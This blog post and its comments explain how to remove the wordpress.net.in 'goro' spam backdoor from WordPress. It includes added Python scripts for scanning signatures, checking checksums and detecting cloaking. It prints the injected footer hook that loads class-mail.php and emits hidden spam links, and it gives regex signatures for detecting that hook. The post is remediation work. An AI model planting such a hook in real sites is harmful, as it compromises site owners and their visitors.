I found this while browsing the WordPress support forum: some of these victims update their default_filters.php and upload class-mail.php inside their WordPress without being aware that it's a backdoor (wordpress.net.in). There is no class-mail.php in WordPress, only class-phpmailer.php, so don't get confused by it.

Below is a quick workaround for removing the offending goro spamware injection before Google bans you from the internet pipes.
Workaround
- Temporarily disable remote includes in your php.ini settings.

    ;;;;;;;;;;;;;;;;;;
    ; Fopen wrappers ;
    ;;;;;;;;;;;;;;;;;;
    ; Whether to allow the treatment of URLs (like http:// or ftp://) as files.
    allow_url_fopen = off
    allow_url_include = off

- Check your .htaccess for suspicious redirects.
- Find class-mail.php inside the “*/wp-includes/” directory and remove it.
- Find the following code inside “*/wp-includes/default_filters.php” and remove it:

    add_action('wp_footer','wpc7c16b8466d864eeefd20050625c7775');
    function wpc7c16b8466d864eeefd20050625c7775() {
        @include('./wp-includes/class-mail.php');
        if(sizeof($wparr)>0){
            echo "!div id=\"goro\"!";
            foreach($wparr as $k=>$v){
                echo "".ucwords($v['key'])."\n";
                if($i++==$inum) break;
            }
            echo "!/div!".$_footer;
        }
    }

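A scanner for the signatures in the injected code above, as an added example that is not part of the original post. Treating the hook name as "wp" followed by 32 hex characters generalises the single name shown, which is an assumption; the sample text and all function names are constructed for this example.

```python
import re
from pathlib import Path

# Signatures derived from the injected code quoted in the post. Treating the hook
# name as "wp" + 32 hex characters generalises the single name shown (assumption).
SIGNATURES = {
    "hex-named hook": re.compile(
        r"add_action\(\s*['\"]wp_(?:footer|head)['\"]\s*,\s*['\"]wp[0-9a-f]{32}['\"]"),
    "class-mail.php include": re.compile(
        r"include\w*\s*\(?\s*['\"][^'\"]*class-mail\.php"),
    "goro container": re.compile(r"id=\\?['\"]?goro"),
}

def scan_text(text):
    """Return [(line_number, signature_name)] for every matching line."""
    hits = []
    for number, line in enumerate(text.splitlines(), start=1):
        for name, pattern in SIGNATURES.items():
            if pattern.search(line):
                hits.append((number, name))
    return hits

def scan_tree(root):
    """Scan every .php file under root; class-mail.php is flagged by name too."""
    report = {}
    for path in sorted(Path(root).rglob("*.php")):
        hits = scan_text(path.read_text(encoding="utf-8", errors="replace"))
        if path.name == "class-mail.php":
            hits.insert(0, (0, "backdoor file name"))  # line 0 = the file itself
        if hits:
            report[str(path.relative_to(root))] = hits
    return report

# Constructed sample: the tail of an infected default_filters.php.
SAMPLE = """add_filter('the_title', 'wptexturize');
add_action('wp_footer','wpc7c16b8466d864eeefd20050625c7775');
function wpc7c16b8466d864eeefd20050625c7775() {
@include('./wp-includes/class-mail.php');
echo "!div id=\\"goro\\"!";
}
"""

if __name__ == "__main__":
    import sys
    if len(sys.argv) > 1:  # usage: python scan.py /path/to/wordpress
        for name, found in scan_tree(sys.argv[1]).items():
            print(name, found)
    else:
        print(scan_text(SAMPLE))
```

A clean scan only means these particular strings are absent; a variant with different names will not match.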
Robots.txt Exclusion
Optional - Prevent Googlebot from indexing the static spam page.
Log in to WordPress Admin > Manage > Files > Other Files → key in “Robots.txt”. Add the following code.

    User-agent: Googlebot
    Disallow: /*?*
    Disallow: /*?

Refer to robots.txt.
Possible WordPress class (suspicious) files that would be tampered with
Compute the MD5 checksum of the following files and compare them with the official versions from the WordPress Release Archive.
The above methods only remove and disable the spam links; there is no guarantee that they will protect you from future vulnerabilities. Back up (or export your posts using WordPress eXtended RSS - WXR) and perform a full upgrade.
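The checksum comparison described above, as an added example that is not part of the original post. It assumes you have unpacked the official archive for the same WordPress version next to the live site; the function names and command-line usage are this example's own.

```python
import hashlib
import os

def md5_of(path):
    """MD5 of a file, read in chunks (MD5 because that is what the post compares)."""
    digest = hashlib.md5()
    with open(path, "rb") as handle:
        for chunk in iter(lambda: handle.read(65536), b""):
            digest.update(chunk)
    return digest.hexdigest()

def hash_tree(root):
    """Map each file's path, relative to root, to its MD5."""
    hashes = {}
    for folder, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(folder, name)
            hashes[os.path.relpath(full, root)] = md5_of(full)
    return hashes

def compare_with_release(site_dir, release_dir):
    """Compare a live directory (e.g. wp-includes) with the same directory
    unpacked from the official archive of the same WordPress version."""
    site, release = hash_tree(site_dir), hash_tree(release_dir)
    return {
        # Present in both but different content: edited core file.
        "modified": sorted(p for p in site if p in release and site[p] != release[p]),
        # Present only on the site: a file WordPress never shipped.
        "unexpected": sorted(p for p in site if p not in release),
        # Shipped by WordPress but absent from the site.
        "missing": sorted(p for p in release if p not in site),
    }

if __name__ == "__main__":
    import sys
    # Usage: python compare.py /path/to/site/wp-includes /path/to/clean/wp-includes
    result = compare_with_release(sys.argv[1], sys.argv[2])
    for kind, paths in result.items():
        for path in paths:
            print(f"{kind}: {path}")
```

Compare against the archive for the exact version you run; otherwise every file that changed between releases is reported as modified.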
- Dec 13, 2007
I just noticed this recently. You'll need to check your site's HTTP header. Most of the hijacked websites don't respond with a correct HTTP status header (400<>500). My guess is they did this to cloak from being crawled by search engine spiders. If you have cleaned all the infected files and your header doesn't respond correctly, get a rootkit scanner.

Check your website's status header and try cloaking your browser (UA) as a search engine crawler. The following screenshot will show you how to set this up at web-sniffer.net.
This method may not work if the cloaking scripts use IP-based tracking, so try different user agent strings (e.g. inoktomi, askjeeves, ia_archiver).
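The status-header check described above, scripted for your own site, as an added example that is not part of the original post. The crawler names are the ones the post mentions; the browser string, the function names and the injectable `fetch` parameter are assumptions of this example.

```python
import urllib.error
import urllib.request

# Crawler names come from the post; the browser string is a constructed sample.
BROWSER_UA = "Mozilla/5.0 (X11; Linux x86_64) ExampleBrowser/1.0"
CRAWLER_UAS = ["Googlebot", "inoktomi", "askjeeves", "ia_archiver"]

def fetch_status(url, user_agent, timeout=10):
    """Return the HTTP status code the server sends to this user agent.

    urllib follows redirects, so this is the status of the final response.
    """
    request = urllib.request.Request(url, headers={"User-Agent": user_agent})
    try:
        with urllib.request.urlopen(request, timeout=timeout) as response:
            return response.status
    except urllib.error.HTTPError as error:
        return error.code  # 4xx/5xx are raised as exceptions; keep the code

def status_by_agent(url, fetch=fetch_status):
    """Request the same URL once per user agent and return {user_agent: status}."""
    return {agent: fetch(url, agent) for agent in [BROWSER_UA] + CRAWLER_UAS}

def flag_cloaking(statuses):
    """Return the crawler entries that differ from the browser's status or are
    errors (>= 400), which is the symptom the post describes."""
    baseline = statuses[BROWSER_UA]
    return {
        agent: status
        for agent, status in statuses.items()
        if agent != BROWSER_UA and (status != baseline or status >= 400)
    }

if __name__ == "__main__":
    import sys
    # Usage: python ua_check.py http://your-own-site.example/
    seen = status_by_agent(sys.argv[1])
    print("all statuses:", seen)
    print("suspicious:", flag_cloaking(seen))
```

As the post notes, a script that cloaks by crawler IP address will serve the same status to every user agent from your machine, so an empty result does not prove the site is clean.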
Firefox Browser
You can also override your user agent string in Firefox:
about:config → general.useragent.override = ‘ua strings’
Wordpress.net.in Backdoor
Wordpress.net.in Doorway
Dec 24, 2007 → http://www.wordpress.net.in/mentors/alxumuk/
Backdoor Files
Inside the wp-includes directory:
- compat.php - (replace with latest version)
- class-mail.php - (delete)
Scan for and remove all backdoor files, then create a .htaccess file inside wp-includes and wp-content/plugins. Add the following code to disable directory listing (prevents information leaks and directory search indexing).
Options -Indexes
Wordpress.net.in New Partner
Feb 23rd 2008: we found a signature similar to wordpress.net.in at qwetro.com (Germany). Probably from the same attacker with a different agenda.
Remove malicious create_function wp_head filters
These are fixes for the wordpress.net.in spam header injection.
    /**
     * Remove create_function action hooks
     * appended to the WordPress wp_head filters
     *
     * @author Avice De'véreux <ck@kaizeku.com>
     * @copyright Copyright (c) 2006 Avice De'véreux
     * @version 1.0
     * @license http://www.gnu.org/licenses/lgpl.html GNU Lesser General Public License
     * @link http://blog.kaizeku.com/wordpress/goro-spam-injection-wp-head-patch/
     */
    function remove_create_function_action() {
        global $wp_filter;
        $action_ref = 'wp_head';
        if ( ! isset($wp_filter[$action_ref]) ) {
            return; // nothing is hooked on wp_head
        }
        $filter = $wp_filter[$action_ref];
        $_lambda = array();
        // Collect callbacks whose name contains "lambda", i.e. functions
        // made with create_function(). Only priorities 1-10 are inspected.
        foreach(range(1,10) as $priority){
            if (isset($filter[$priority])) {
                foreach($filter[$priority] as $registered_filter ){
                    if ( ! is_string($registered_filter['function']) ) {
                        continue; // array/object callbacks are not lambdas
                    }
                    $callback = $registered_filter['function'];
                    if ( preg_match("/lambda/", $callback) ) {
                        $_lambda[$priority][] = $callback;
                    }
                }
            }
        }
        // $_lambda maps priority => list of callbacks, so remove them one by one.
        // Note: this also removes any legitimate create_function() hook on wp_head.
        foreach($_lambda as $priority => $callbacks) {
            foreach($callbacks as $callback) {
                if ( has_filter($action_ref,$callback) ){
                    remove_filter($action_ref, $callback, $priority, 1);
                }
            }
        }
    }
    add_action('init','remove_create_function_action');

The plugin can be downloaded at Kaizeku Ban, goro spam injection fixes
External Links
- Websniffer View HTTP Request and Response Header
- Wordpress Support Forum
- National Vulnerability Database Wordpress 2.0 > 2.0.6
- November 30, 2007 at 9:06 am
- June 24, 2008 at 3:55 pm
21 Responses to “How to remove wordpress.net.in spams”
I got hacked too, mine was spam links to
donaldsensing.com:6666

I'm not sure what "alxumuk"'s real name is, but there is an editor at DMOZ with a similar display name.
Lack Resources
ATM I only have a few raw access logs from Murray's blog & Jens's blog. Matt Heaton never replies.
I hope that Mr. Goro got careless and shows his footprint; I need more raw access logs. Send them to my email

If you would be so kind as to help me clean the infected files, of which there are quite a few; your program is interesting to learn, but I am not an expert in this.
Could you help me with this? I would be enormously grateful.
Thank you
Sincerely
Patricia

There are two versions of goro spam.
If you still can't remove the spam links, try editing theme > header.php and theme > footer.php: find and comment out 'wp_head()' and 'wp_footer()' temporarily (this will also disable any plugins and widgets that depend on these hooks).